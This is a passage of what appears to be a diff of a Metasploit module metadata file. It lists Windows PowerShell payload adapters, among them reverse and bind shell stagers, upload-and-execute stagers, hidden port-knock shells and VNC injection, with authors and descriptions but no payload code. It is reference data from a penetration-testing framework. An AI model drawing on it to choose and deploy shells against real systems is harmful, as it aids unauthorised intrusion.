PowerShell.\n\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": 
"cmd/windows/powershell", - "adapted_refname": "windows/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/speak_pwned": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/speak_pwned", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Berend-Jan \"SkyLined\" Wever " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/speak_pwned", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/speak_pwned", - "staged": false - }, - "payload_cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/upexec/bind_hidden_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/upexec/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_hidden_tcp", - "check": false, - "post_auth": 
false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/upexec/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - 
"skape ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/upexec/bind_named_pipe": { - "name": "Powershell Exec, Windows Upload/Execute, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/upexec/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_named_pipe", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/upexec/bind_nonx_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/upexec/bind_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)", - 
"references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/upexec/bind_tcp_rc4": { - "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp_rc4" - }, - 
"payload_cmd/windows/powershell/upexec/bind_tcp_uuid": { - "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/upexec/find_tag": { - "name": "Powershell Exec, Windows Upload/Execute, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/upexec/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - 
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/find_tag", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/upexec/reverse_ipv6_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/upexec/reverse_nonx_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_nonx_tcp", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/upexec/reverse_ord_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp_allports": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an 
executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp_dns": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": 
"windows/upexec/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp_rc4": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it 
(staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp_uuid": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_tcp_uuid", - "staged": true, - "stage_refname": 
"windows/upexec", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/upexec/reverse_udp": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse UDP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "RageLtMan " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_udp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_udp" - }, - "payload_cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). 
After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/vncinject/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/vncinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 
